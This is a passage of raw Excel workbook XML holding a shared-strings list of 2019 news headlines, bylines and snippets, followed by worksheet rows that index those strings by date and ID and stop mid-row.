provides comprehensive analysis of Market growth drivers Factors limiting market growth Current market trends Market structure Market projections for upcoming years This report is a complete study of current trends in the market, industry growth drivers, and restraints. It provides market projections for the coming years. It includes analysis of recent developments in technology, Porter’s five force model analysis and detailed profiles of top industry players. The report also includes a review of micro and macro factors essential for the existing market players and new entrants along with detailed value chain analysis. Reasons for Buying this Report This report provides pin-point analysis for changing competitive dynamics It provides a forward looking perspective on different factors driving or restraining market growth It provides a six-year forecast assessed on the basis of how the market is predicted to grow It helps in understanding the key product segments and their future It provides pin point analysis of changing competition dynamics and keeps you ahead of competitors It helps in making informed business decisions by having complete insights of market and by making in-depth analysis of market segments It provides distinctive graphics and exemplified SWOT analysis of major market segments Note: Although care has been taken to maintain the highest levels of accuracy in TMR’s reports, recent market/vendor-specific changes may take time to reflect in the analysis. Request For Discount On This Report At https://www.transparencymarketresearch.com/sample/sample.php?flag=D&amp;rep_id=9359&amp;source=atm Download WordPress Themes Free Download WordPress Themes Free Free Download WordPress Themes Premium WordPress Themes Download download udemy paid course for free download lava firmware Premium WordPress Themes Download udemy free download TagsChina Plastic Bottle Recycling Market Trend Europe Plastic Bottle Recycling Market Growth UK Plastic Bottle Recycling Market US Plastic Bottle Recycling Market CAGR</t>
  </si>
  <si>
    <t>Ireland fear Jack Conan’s foot injury could prove a World Cup “setback” for the Leinster back-row forward. Conan was meant to start...</t>
  </si>
  <si>
    <t>The California Senate has passed a bill that would give new wage and benefit protections to workers at so-called gig economy companies like...</t>
  </si>
  <si>
    <t>Washington Nationals (79-64, second in the NL East) vs. Minnesota Twins (89-55, first in the NL Central) Minneapolis; Wednesday, 7 p.m....</t>
  </si>
  <si>
    <t>Arne Green    @arnegreen</t>
  </si>
  <si>
    <t>MANHATTAN — Three days after the fact, AJ Parker was still kicking himself over what should have been a huge play for Kansas State's...</t>
  </si>
  <si>
    <t>Investors interested in stocks under $12 should take a look at Cross Timbers Royalty Trust (NYSE:CRT). The stock has gained quite a bit of...</t>
  </si>
  <si>
    <t>Cat Zakrzewski, The Washington Post</t>
  </si>
  <si>
    <t>Silicon Valley doesn't just have to worry about antitrust action in Washington. States are becoming an important and perhaps more...</t>
  </si>
  <si>
    <t>Yuras Karmanau and Nataliya Vasilyeva, Associated Press</t>
  </si>
  <si>
    <t>FILE - In this file photo taken on Aug. 29, 2019, Ukrainian President Volodymyr Zelenskiy speaks to newly elected Ukrainian parliament...</t>
  </si>
  <si>
    <t>Japan's economy grew at a slower pace than initially estimated in the second quarter as the U.S.-China trade war prompted a downward...</t>
  </si>
  <si>
    <t>SILVER SPRING, Md., Sept. 30, 2019 /PRNewswire/ -- After a series of large-scale food safety problems almost a decade ago, Congress passed...</t>
  </si>
  <si>
    <t>IFA – As consumers generate more content than ever, Western Digital Corp. (NASDAQ: WDC) is creating and delivering innovative solutions to...</t>
  </si>
  <si>
    <t>Miller &amp; Zois has recently launched a new Birth Injury section on the firm's popular Maryland injury law website. Online PR News –...</t>
  </si>
  <si>
    <t>GENEVA (AP) Roger Federer and Rafael Nadal won their singles matches Saturday to help Team Europe retain its lead over Team World on Day 2...</t>
  </si>
  <si>
    <t>Show Everyone » | Browse All Stan Wawrinka Photos » Start Over In This Photo: Stan Wawrinka Stan Wawrinka of Switzerland serves during...</t>
  </si>
  <si>
    <t>Ken Stone</t>
  </si>
  <si>
    <t>A murder charge was filed Friday against a 20-year-old man who allegedly gunned down another man in broad daylight in a neighborhood near...</t>
  </si>
  <si>
    <t>Vicki NewmanSenior Celebrity Reporter</t>
  </si>
  <si>
    <t>It's reportedly all over for the Love Island winners just over a month after the show came to an end</t>
  </si>
  <si>
    <t>Alphabet Inc's Google said on Monday it is rolling out Google Play Pass, a subscription service that gives Android users access to more...</t>
  </si>
  <si>
    <t>FREDERICKSBURG, Texas, Sept. 9, 2019 /PRNewswire-PRWeb/ -- Director Kevin Booth's newly released "Shadows of Sofia" chronicles the...</t>
  </si>
  <si>
    <t>MarvinStinson</t>
  </si>
  <si>
    <t>These days, Ben Rhodes is criticizing the Trump administration's response to the coordinated drone attacks on Saudi oil facilities. While...</t>
  </si>
  <si>
    <t>Envestnet Asset Management Inc. grew its position in Chipotle Mexican Grill, Inc. (NYSE:CMG) by 100.4% during the 2nd quarter, according...</t>
  </si>
  <si>
    <t>LOS ANGELES, Sept. 9, 2019 /PRNewswire/ -- ServiceTitan, the world's leading all-in-one software for residential home service businesses,...</t>
  </si>
  <si>
    <t>The measuring instrument revealed that all tested versions had 4 GB of RAM in their equipment Antutu posted a Weibo post on the social...</t>
  </si>
  <si>
    <t>Real Madrid are reportedly set to verify the exit of Keylor Navas on Monday as he flew out to France on Sunday evening to finished a...</t>
  </si>
  <si>
    <t>ANAHEIM, Calif., Sept. 05, 2019 (GLOBE NEWSWIRE) -- Cadence Aerospace, a provider of highly complex aerospace components and assemblies...</t>
  </si>
  <si>
    <t>WAPPINGERS FALLS, N.Y. (AP) -- Greg Jones had five hits and three RBI, and Rodolfo Sanchez allowed just two hits over six innings as the...</t>
  </si>
  <si>
    <t>Dublin, Sept. 19, 2019 (GLOBE NEWSWIRE) -- The "Biological Evaluation of Medical Devices" conference has been added to...</t>
  </si>
  <si>
    <t>mcar</t>
  </si>
  <si>
    <t>Trump's TV Defense Team Ain't Exactly the '27 Yankees Stephen Miller, Rudy Giuliani, Jim Jordan, and Kevin McCarthy. This is the best...</t>
  </si>
  <si>
    <t>School administrator on leave after alleged racist remarks An administrator at a Miami private school is on administrative leave after she...</t>
  </si>
  <si>
    <t>Hands-on video highlights Google’s striking new color option for the Pixel 4</t>
  </si>
  <si>
    <t>Invesco Ltd. boosted its stake in Lantheus Holdings Inc (NASDAQ:LNTH) by 5.4% in the second quarter, according to the company in its most...</t>
  </si>
  <si>
    <t>Ownera requests that their press release NewsItemId: 20190920005084 issued Sept. 20, 2019, “Ownera Partners with Amazon on Hackathon to...</t>
  </si>
  <si>
    <t>VANCOUVER, British Columbia, Sept. 18, 2019 (GLOBE NEWSWIRE) -- AgraFlora Organics International Inc. (“AgraFlora” or the “Company”)...</t>
  </si>
  <si>
    <t>Frontline Ltd. (the “Company”) advises that the 2019 Annual General Meeting of the Shareholders of the Company was held on September 13,...</t>
  </si>
  <si>
    <t>An Independent Mail investigation shows that Anderson County Sheriff’s deputies have been involved in 18 shootings between 2009 and 2018.</t>
  </si>
  <si>
    <t>Warning: SPOILERS for Godzilla: King of the Monsters forward! This yr’s Godzilla: King of the Monsters was a battle royal of kinds,...</t>
  </si>
  <si>
    <t>Infinera (NASDAQ: INFN) announced today that RETN, an international network service provider, used Infinera's fourth-generation Infinite...</t>
  </si>
  <si>
    <t>Scunthorpe defender James Perch has had his red card in the midweek Leasing.com Trophy victory over Grimsby rescinded.</t>
  </si>
  <si>
    <t>Cash-starved Air India is putting its crew on a diet, changing their in-flight menu to special low-fat meals. Dhananjay Kumar, the...</t>
  </si>
  <si>
    <t>The 4th annual South Dakota salutes event is being held today and tomorrow in Humboldt. Raising money for the families of South Dakota...</t>
  </si>
  <si>
    <t>Queensland Premier Annastacia Palaszczuk has pleaded with tourists not to abandon regions decimated by bushfires. She said the government...</t>
  </si>
  <si>
    <t>NEW YORK (AP) — Police say a Texas man bashed New York’s Charging Bull statue with a metal object and damaged one of its horns. Tevon...</t>
  </si>
  <si>
    <t>Australian European Tour golfer, Jason Scrivener, says he never gets sick of playing St Andrews. “I love St Andrews. I’d play it every...</t>
  </si>
  <si>
    <t>In case you missed it, America has been kind of obsessed...</t>
  </si>
  <si>
    <t>Press Release Nokia completes world’s first single-carrier terabit-per-second field trial, sets optical transmission capacity record over...</t>
  </si>
  <si>
    <t>By Kelli Johnson</t>
  </si>
  <si>
    <t>8-year-old killed after being struck in Oxnard An 8-year-old was killed and two others were injured after being struck by a teenage...</t>
  </si>
  <si>
    <t>By Brendan O'Brien (Reuters) - A man convicted of shooting a 61-year-old grandmother to death as he and his accomplice burglarized her...</t>
  </si>
  <si>
    <t>TAIPEI (AFP) - A Canadian frigate was passing through the Taiwan Strait on Tuesday (Sept 10), Taipei's Defence Ministry said, in the latest...</t>
  </si>
  <si>
    <t>Tom Rossignoll shares why he should be re-elected to Peabody City Council in the latest Patch candidate profile for the 2019 city election.</t>
  </si>
  <si>
    <t>On Monday, September 23, 2019, the Stage Managers’ Association (SMA) will present its annual Del Hughes Awards for Lifetime Achievement in...</t>
  </si>
  <si>
    <t>Investors sentiment increased to 1.66 in Q2 2019. Its up 0.40, from 1.26 in 2019Q1. It improved, as 23 investors sold The Medicines Company...</t>
  </si>
  <si>
    <t>Kronos Incorporated today announced that Inframark, an independent water and wastewater operations organization, has deployed Kronos...</t>
  </si>
  <si>
    <t>MemorialCare Miller Children’s &amp; Women’s Hospital Long Beach rehabilitation patients with disabilities set sail for a summer adventure out...</t>
  </si>
  <si>
    <t>September 06, 2019 - /PressAdvantage/ - Gilbert, Arizona, based LinkFusions is excited to announce they have launched a "&gt;multi channel...</t>
  </si>
  <si>
    <t>Ashley Collman</t>
  </si>
  <si>
    <t>pregnant woman Africa Studio/Shutterstock A doctor and a nurse in South Korea are under investigation after police said they mistakenly...</t>
  </si>
  <si>
    <t>The "Global Molecular Diagnostics Point of Care Market: Focus on Application, Technology, Type, End User, Country Data (15 Countries), and...</t>
  </si>
  <si>
    <t>Police were at the scene shortly after, as frightened flyers left Terminal A so quickly many left behind their luggage.</t>
  </si>
  <si>
    <t>(Sadly, not the Mate30 though). While great news for enthusiasts, it's still not great for consumers, and given how many Android users...</t>
  </si>
  <si>
    <t>LONDON (AP) — British Airways says it has had to cancel almost all flights as a result of a pilots' 48-hour strike over pay. In a statement...</t>
  </si>
  <si>
    <t>Werner Herzog has said the removal of the “fragile” human race from the planet would be “no tragedy”. The German director has shared his...</t>
  </si>
  <si>
    <t>/CNW/ - The Toronto International Film Festival's Share Her Journey campaign and Four Seasons Hotel Toronto are pleased to present the Icon Award to Dame Anna Wintour, DBE, Editor-in-Chief of Vogue and Artistic Director and Global Content Advisor of Condé Nast. The Icon Award serves as recognition of a lifetime achievement for the advancement of women in film, television, and the arts. In 1988, when Wintour took the helm of American Vogue, she fearlessly revitalized the title in many ways, especially by showcasing celebrities on its covers which before had shown only models. In the years that followed, the all-important September issue cover featured powerhouse female stars including Renée Zellweger, Madonna, Lady Gaga, Beyoncé, Rihanna, Emma Stone, and many others. With Wintour at the helm now for over three decades, Vogue has photographed a multitude of iconic women from around the globe, not only celebrities and models but politicians, activists, writers, artists, and more. An opinionated leader in the media landscape, Wintour has always stood her ground with respect to the creative direction of Vogue and the Condé Nast titles she oversees, unabashed when taking a stand in support of her beliefs. As she noted in an interview with CNN: "I think it's very, very important to have a point of view—and we profile women in the magazine that we believe in." Wintour continues to inspire generations of dreamers, believers, and fans of the arts around the world. She is—and has always been—determined to push boundaries as she continues to lead a team of some of the most formidable creative minds in the industry with her unifying and unapologetically female voice. Joana Vicente, Executive Director and Co-Head TIFF says Share Her Journey is TIFF's five-year campaign aimed at increasing participation, skills, and opportunities for women behind and in front of the camera. "The campaign prioritizes gender parity with a focus on mentorship, skills development, media literacy, and activity for young people. Of all Festival titles in this year's lineup, 36 per cent are directed, co-directed, or created by women, and women comprise half the Festival's programming team." Vicente says as part of Share Her Journey, TIFF continues to provide over 120 female creators free access to TIFF's Industry Conference and year-round programming. The overall number of speakers at this year's Conference represents a 50/50 gender split, as do the organization's Talent Development initiatives such as TIFF Studio, Filmmaker Lab, and TIFF Rising Stars. "The Icon Award was created to recognize women and the significant impact they have on media, music, film, fashion, and television," says Konrad Gstrein, General Manager of Four Seasons Hotel Toronto. "Dame Anna has been a formidable force for support by placing talented women at the forefront of the media landscape, and they've graced the covers of Vogue as both style icons and true talents of their craft. It's an absolute privilege to be a part of honouring her this year." "Long before people were truly called icons, Dame Anna defined that title," says Barry Avrich, Producer and Event Co-Chair. "Powerful and relentlessly passionate, she has become the most influential figure in fashion by creating legends, championing female journalists, inspiring new designers, and empowering thousands of women. It is beyond thrilling to celebrate her success." This year's inaugural presentation of the Icon Award at Four Seasons Hotel Toronto with TIFF's Share Her Journey is in partnership with Yorkville Village. About the Share Her Journey movement Share Her Journey is a campaign organized by the Toronto International Film Festival to empower women in ﬁlm. TIFF has made a five-year commitment to increasing participation, skills, and opportunities for women behind and in front of the camera. We will prioritize gender parity with a focus on mentorship, media literacy, and activity for young people. Since launching Share Her Journey, we've met so many inspiring women and have made great steps toward narrowing the gender gap by providing female creators with new opportunities. About Four Seasons Hotel Toronto Four Seasons Hotel Toronto is Canada's first hotel to receive both AAA Five Diamond and Forbes Travel Guide Five Star ratings. Having opened in October 2012, the Hotel features 259 guest rooms, a 30,000-square-foot luxury spa, and Café Boulud and d|bar by international restaurateur and chef Daniel Boulud. Recent awards and honors include 2017 TripAdvisor's Traveller's Choice Winner—#1 Best Hotel in Toronto, Robb Report's Best of the Best, Condé Nast Traveller's Hot List, and Travel+Leisure's Top City Hotel in Canada. For more information, visit our Press Room or check out Facebook. In addition to an international reputation as a home away from Hollywood for A-List celebrities, Four Seasons Hotel Toronto hosts events that celebrate female actors. For the second consecutive year, dbar will transform the lobby-level public spaces into a photo exhibit featuring iconic red carpet moments (shot by celebrity photographer George Pimentel) of women including Penelope Cruz, Meryl Streep, Lady Gaga, Sandra Oh, Emily Blunt, Renée Zellweger, Jennifer Lopez, Dakota Johnson, Beyoncé and Margot Robbie. To complete the exhibit, the Hotel has also displayed an iconic image of Dame Anna Wintour, as a tribute to her significant career achievements. Website: fourseasons.com/toronto Instagram: @fstoronto Twitter: @fstoronto Facebook: FourSeasonsHotelToronto</t>
  </si>
  <si>
    <t>The New York Times has crunched some numbers about Guantanamo Bay to come up with quite a stat: The US spends $13 million per prisoner each...</t>
  </si>
  <si>
    <t>Shares of R1 RCM Inc (NASDAQ:RCM) have been assigned an average rating of “Buy” from the six analysts that are currently covering the...</t>
  </si>
  <si>
    <t>Melanie Whelan</t>
  </si>
  <si>
    <t>FOOTBALL media personality and player manager Liam Pickering is calling on all sports fans to get behind a Ballarat boy in the "fight of...</t>
  </si>
  <si>
    <t>Sep, Sun 29 2019 - 9:00 AM to 4:30 PM</t>
  </si>
  <si>
    <t>The report scrutinizes the market by an exhaustive analysis on Global Solar Generator Market dynamics, market size, current trends, issues,...</t>
  </si>
  <si>
    <t>16 Sep, 2019 - Northbound Treatment Services is called the superlative treatments for all kinds of addictions. Their treatments work big...</t>
  </si>
  <si>
    <t>For the second-straight week, the Chicago Bears went on the road and came away with a victory. In the NFL, when road wins are tough to come...</t>
  </si>
  <si>
    <t>CESAR GARCIA</t>
  </si>
  <si>
    <t>BOGOTA, Colombia (AP) — A little over a week before her lifeless body was found in an abandoned, burnt-out vehicle, Karina García could...</t>
  </si>
  <si>
    <t>August 27, 2019 Reframing the History of Slavery in Angola and the U. S. (TriceEdneyWire.com/GIN) - If the U.S. has 35,000 museums, a...</t>
  </si>
  <si>
    <t>By Sagar Tirmare</t>
  </si>
  <si>
    <t>The "Feed Proteases Market" report contains a wide-extending factual assessment for Feed Proteases, which enables the customer to separate...</t>
  </si>
  <si>
    <t>Nike (NYSE:NKE) will be posting its quarterly earnings results after the market closes on Tuesday, September 24th. Analysts expect Nike to...</t>
  </si>
  <si>
    <t>Former boxing promoter Kellie Maloney has revealed she attempted suicide after being made to doubt her male-to-female transition. Kellie...</t>
  </si>
  <si>
    <t>By Claire Toureille For Mailonline</t>
  </si>
  <si>
    <t>Cryptic literary puzzle Cain's Jawbone: A Novel Problem, first published in 1934 Consists of 100 cards that need to be reordered to solve a...</t>
  </si>
  <si>
    <t>Ledyard National Bank is pleased to announce that it has been named one of Business NH Magazine’s 2019 Best Companies to Work For. For more...</t>
  </si>
  <si>
    <t>Ross Kennerley</t>
  </si>
  <si>
    <t>Virgil van Dijk has insisted he's lucky to have Roberto Firmino on his side as his qualities are ones he wouldn't like to come up against...</t>
  </si>
  <si>
    <t>By Baleseng Batlotleng</t>
  </si>
  <si>
    <t>Maun — Click to see more pictures The political party thematic debate in Maun on Wednesday elicited mixed reactions, but the general...</t>
  </si>
  <si>
    <t>It's no joker. The night is lighting up Saturday around the world with the famous bat signal to mark a special anniversary for Batman. DC...</t>
  </si>
  <si>
    <t>The Professional Triathletes Organisation today announced that it has appointed Sam Renouf as its Chief Executive Officer and that it has...</t>
  </si>
  <si>
    <t>BANDERA, Texas, Sept. 25, 2019 /PRNewswire/ -- Church's Chicken®, along with franchisee Cleo Bustamante Enterprises, is celebrating the...</t>
  </si>
  <si>
    <t>Sentiment for Wendys International Inc (NASDAQ:WEN) Wendys International Inc (NASDAQ:WEN) institutional sentiment increased to 1.2 in Q2...</t>
  </si>
  <si>
    <t>Apple Inc. and the Walt Disney Co. could have merged had Steve Jobs not died, Disney Chief Executive Bob Iger believes.</t>
  </si>
  <si>
    <t>R.J. MORGAN</t>
  </si>
  <si>
    <t>STARKVILLE, Miss. (AP) — Kylin Hill rushed for 120 yards and three touchdowns to lead Mississippi State to a 28-13 victory over Kentucky on...</t>
  </si>
  <si>
    <t>Staff report</t>
  </si>
  <si>
    <t>Douglas County residents who love 4-H, FFA and the county fair and rodeo are needed to sit on the Douglas County Fair Board and represent a...</t>
  </si>
  <si>
    <t>Tim Sykes</t>
  </si>
  <si>
    <t>Earlier this year, while serving as one of the judges in the Packaging Innovation Awards (organised by Dow) I came across an intriguing...</t>
  </si>
  <si>
    <t>Cannabidiol, better known as CBD, has been touted as a treatment for everything from insomnia to aches and pains. CBD is one of the...</t>
  </si>
  <si>
    <t>CURT ANDERSON AP Legal Affairs Writer</t>
  </si>
  <si>
    <t>MIAMI (AP) — A Florida health care executive has been sentenced to 20 years in prison after his conviction on 20 counts in what prosecutors...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — About 140 U.S. flags bearing an extra star are flying along Pennsylvania Avenue as Washington, D.C., prepares for its...</t>
  </si>
  <si>
    <t>By Christos Tsiolkas</t>
  </si>
  <si>
    <t>More than two decades after he collaborated on Who's Afraid of The Working Class?, Christos Tsiolkas is again questioning what it really...</t>
  </si>
  <si>
    <t>Granutools</t>
  </si>
  <si>
    <t>Plasma-spraying deposition, like many applications that guarantee a high reproducibility of processes, requires the use of free-flowing...</t>
  </si>
  <si>
    <t>In the hunt for a higher cancer remedy, few researchers bother to look again at the graveyard of failed medicines to figure out what went...</t>
  </si>
  <si>
    <t>Resorts World Catskills Casino Resort, New York’s newest and closest integrated casino resort to Manhattan, today announced that the...</t>
  </si>
  <si>
    <t>Semis are coming out of a volatile summer stretch. Here's one buy signal Newton Advisors' Mark Newton is watching.</t>
  </si>
  <si>
    <t>NEWPORT NEWS, Va., Sept. 05, 2019 (GLOBE NEWSWIRE) -- Huntington Ingalls Industries (NYSE:HII) announced today that its Technical...</t>
  </si>
  <si>
    <t>Eton College’s headmaster has slammed Labour’s plans to abolish private schools, saying they won’t profit kids left behind by the training...</t>
  </si>
  <si>
    <t>Saudi Arabia has said its initial inquiries indicate that Iranian weapons were used in attacks on key oil installations, and it will invite...</t>
  </si>
  <si>
    <t>WOODLAND HILLS, Calif., Sept. 20, 2019 /PRNewswire-PRWeb/ -- Representatives with LD Locksmith announced today that it is now offering...</t>
  </si>
  <si>
    <t>"It's my biggest holding," the billionaire entrepreneur and Dallas Mavericks owner said.</t>
  </si>
  <si>
    <t>Los Angeles, CA -- (ReleaseWire) -- 09/12/2019 -- Charitable non-government organizations will soon have a new way to create their own...</t>
  </si>
  <si>
    <t>JERUSALEM (AP) — The Israeli military on Sunday said that Lebanese militants fired a barrage of anti-tank missiles at an Israeli army base,...</t>
  </si>
  <si>
    <t>MICHAEL BIESECKER Associated Press</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — The Trump administration is poised to revoke California's authority to set auto mileage standards, asserting that only...</t>
  </si>
  <si>
    <t>DULUTH, Minn. (AP) — A homeless man has pleaded guilty to starting a fire that destroyed a 117-year-old synagogue in Duluth, Minnesota....</t>
  </si>
  <si>
    <t>#prorogued</t>
  </si>
  <si>
    <t>A group of MPs have staged a protest in the House of Commons as the official ceremony to suspend Parliament took place.</t>
  </si>
  <si>
    <t>SYDNEY/BANGKOK (Reuters) - Thousands of students took to the streets of Australia and other Asia-Pacific nations on Friday to kick off a...</t>
  </si>
  <si>
    <t>SURREY, B.C. — Two teenagers have been charged with murder in the stabbing death of a man last month in Surrey, B.C. The Integrated...</t>
  </si>
  <si>
    <t>Arsene Wenger has not ruled out the possibility of taking charge of a national team at the 2022 World Cup in Qatar.</t>
  </si>
  <si>
    <t>Ellen Dunger</t>
  </si>
  <si>
    <t>Women's rugby league is one of the fastest growing areas of the sport and it is set for even more expansion in the tackle format. Group 19...</t>
  </si>
  <si>
    <t>There’s no shortage of ways in which Missouri coaches can deploy running backs Larry Rountree III and Tyler Badie against opposing...</t>
  </si>
  <si>
    <t>Keybank National Association OH lifted its stake in shares of Plains All American Pipeline, L.P. (NYSE:PAA) by 12.1% during the second...</t>
  </si>
  <si>
    <t>Celsius Holdings Announces Launch of Public Offering of Common Stock [11-September-2019] BOCA RATON, Fla., Sept. 11, 2019 /PRNewswire/...</t>
  </si>
  <si>
    <t>LONDON — British Prime Minister Boris Johnson travels to Scotland on Friday, announcing an increase in funding for farming as he continues...</t>
  </si>
  <si>
    <t>ATHENS, Greece (AP) — Greece is preparing a formal request to borrow the British Museum’s sculptures removed more than 200…</t>
  </si>
  <si>
    <t>HICKSVILLE, N.Y., Sept. 24, 2019 /PRNewswire/ -- In simplest terms, a downturn is a period of time when business is down. Whether it's due...</t>
  </si>
  <si>
    <t>TOKYO -- The head of the U.S. space agency on Tuesday criticized China for employing area for military functions, caution that any try and...</t>
  </si>
  <si>
    <t>Serious Theater has announced the Off-Broadway theatrical play, The King, The Final Hours will open their 2020 season in The Dalles,...</t>
  </si>
  <si>
    <t>Mohegan Gaming &amp; Entertainment (MGE) to Operate Casino at Virgin Hotels Las Vegas Slated to Open in 2020 UNCASVILLE, Conn., Sept. 17, 2019...</t>
  </si>
  <si>
    <t>Contact Name: Fact Market Research</t>
  </si>
  <si>
    <t>As the population increases in this world, and advancement in automobiles is emerged the number of accidents also increased. Any sudden...</t>
  </si>
  <si>
    <t>by Jenny Sugar</t>
  </si>
  <si>
    <t>When I found out that Trader Joe's had a new Vegan Ranch Dip, to put it in CrossFit terms, I raced there AQAP (as quick as possible)! I...</t>
  </si>
  <si>
    <t>AGF Investments Inc. increased its position in shares of Sprouts Farmers Market Inc (NASDAQ:SFM) by 22.1% in the 2nd quarter, according to...</t>
  </si>
  <si>
    <t>Date</t>
  </si>
  <si>
    <t>Author</t>
  </si>
  <si>
    <t>UniqueID</t>
  </si>
  <si>
    <t>GroupID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</si>
</sst>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AA9CB-7211-4223-B401-2563B4FEE9D5}">
  <dimension ref="A1:G20001"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <sheetData>
    <row r="1" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1" t="s">
        <v>31921</v>
      </c>
      <c r="B1" t="s">
        <v>31922</v>
      </c>
      <c r="C1" t="s">
        <v>0</v>
      </c>
      <c r="D1" t="s">
        <v>31919</v>
      </c>
      <c r="E1" t="s">
        <v>31920</v>
      </c>
      <c r="F1" t="s">
        <v>1</v>
      </c>
      <c r="G1" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="2" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A2">
        <f>+ROW(A1)</f>
        <v>1</v>
      </c>
      <c r="B2">
        <v>1</v>
      </c>
      <c r="C2" t="s">
        <v>3</v>
      </c>
      <c r="D2" s="1">
        <v>43719</v>
      </c>
      <c r="E2" t="s">
        <v>4</v>
      </c>
      <c r="F2" t="s">
        <v>9975</v>
      </c>
      <c r="G2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="3" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3">
        <f t="shared" ref="A3:A66" si="0">+ROW(A2)</f>
        <v>2</v>
      </c>
      <c r="B3">
        <v>2</v>
      </c>
      <c r="C3" t="s">
        <v>3</v>
      </c>
      <c r="D3" s="1">
        <v>43731</v>
      </c>
      <c r="E3" t="s">
        <v>6</v>
      </c>
      <c r="F3" t="s">
        <v>9975</v>
      </c>
      <c r="G3" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="4" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A4">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="B4">
        <v>3</v>
      </c>
      <c r="C4" t="s">
        <v>3</v>
      </c>
      <c r="D4" s="1">
        <v>43714</v>
      </c>
      <c r="E4" t="s">
        <v>8</v>
      </c>
      <c r="F4" t="s">
        <v>10021</v>
      </c>
      <c r="G4" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="5" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="B5">
        <v>4</v>
      </c>
      <c r="C5" t="s">
        <v>3</v>
      </c>
      <c r="D5" s="1">
        <v>43734</v>
      </c>
      <c r="E5" t="s">
        <v>10</v>
      </c>
      <c r="F5" t="s">
        <v>9975</v>
      </c>
      <c r="G5" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="6" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
      <c r="B6">
        <v>5</v>
      </c>
      <c r="C6" t="s">
        <v>3</v>
      </c>
      <c r="D6" s="1">
        <v>43735</v>
      </c>
      <c r="E6" t="s">
        <v>12</v>
      </c>
      <c r="F6" t="s">
        <v>9975</v>
      </c>
      <c r="G6" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="7" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A7">
        <f t="shared" si="0"/>
        <v>6</v>
      </c>
      <c r="B7">
        <v>6</v>
      </c>
      <c r="C7" t="s">
        <v>3</v>
      </c>
      <c r="D7" s="1">
        <v>43714</v>
      </c>
      <c r="E7" t="s">
        <v>14</v>
      </c>
      <c r="F7" t="s">
        <v>9975</v>
      </c>
      <c r="G7" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="8" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8">
        <f t="shared" si="0"/>
        <v>7</v>
      </c>
      <c r="B8">
        <v>7</v>
      </c>
      <c r="C8" t="s">
        <v>3</v>
      </c>
      <c r="D8" s="1">
        <v>43734</v>
      </c>
      <c r="E8" t="s">
        <v>16</v>
      </c>
      <c r="F8" t="s">
        <v>9975</v>
      </c>
      <c r="G8" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="9" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9">
        <f t="shared" si="0"/>
        <v>8</v>
      </c>
      <c r="B9">
        <v>8</v>
      </c>
      <c r="C9" t="s">
        <v>3</v>
      </c>
      <c r="D9" s="1">
        <v>43711</v>
      </c>
      <c r="E9" t="s">
        <v>18</v>
      </c>
      <c r="F9" t="s">
        <v>9975</v>
      </c>
      <c r="G9" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="10" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10">
        <f t="shared" si="0"/>
        <v>9</v>
      </c>
      <c r="B10">
        <v>9</v>
      </c>
      <c r="C10" t="s">
        <v>3</v>
      </c>
      <c r="D10" s="1">
        <v>43738</v>
      </c>
      <c r="E10" t="s">
        <v>20</v>
      </c>
      <c r="F10" t="s">
        <v>9975</v>
      </c>
      <c r="G10" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="11" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11">
        <f t="shared" si="0"/>
        <v>10</v>
      </c>
      <c r="B11">
        <v>10</v>
      </c>
      <c r="C11" t="s">
        <v>3</v>
      </c>
      <c r="D11" s="1">
        <v>43717</v>
      </c>
      <c r="E11" t="s">
        <v>22</v>
      </c>
      <c r="F11" t="s">
        <v>9975</v>
      </c>
      <c r="G11" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="12" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12">
        <f t="shared" si="0"/>
        <v>11</v>
      </c>
      <c r="B12">
        <v>11</v>
      </c>
      <c r="C12" t="s">
        <v>3</v>
      </c>
      <c r="D12" s="1">
        <v>43736</v>
      </c>
      <c r="E12" t="s">
        <v>24</v>
      </c>
      <c r="F12" t="s">
        <v>9975</v>
      </c>
      <c r="G12" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="13" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13">
        <f t="shared" si="0"/>
        <v>12</v>
      </c>
      <c r="B13">
        <v>12</v>
      </c>
      <c r="C13" t="s">
        <v>3</v>
      </c>
      <c r="D13" s="1">
        <v>43720</v>
      </c>
      <c r="E13" t="s">
        <v>26</v>
      </c>
      <c r="F13" t="s">
        <v>9975</v>
      </c>
      <c r="G13" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="14" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14">
        <f t="shared" si="0"/>
        <v>13</v>
      </c>
      <c r="B14">
        <v>13</v>
      </c>
      <c r="C14" t="s">
        <v>3</v>
      </c>
      <c r="D14" s="1">
        <v>43729</v>
      </c>
      <c r="E14" t="s">
        <v>28</v>
      </c>
      <c r="F14" t="s">
        <v>9975</v>
      </c>
      <c r="G14" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="15" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15">
        <f t="shared" si="0"/>
        <v>14</v>
      </c>
      <c r="B15">
        <v>14</v>
      </c>
      <c r="C15" t="s">
        <v>3</v>
      </c>
      <c r="D15" s="1">
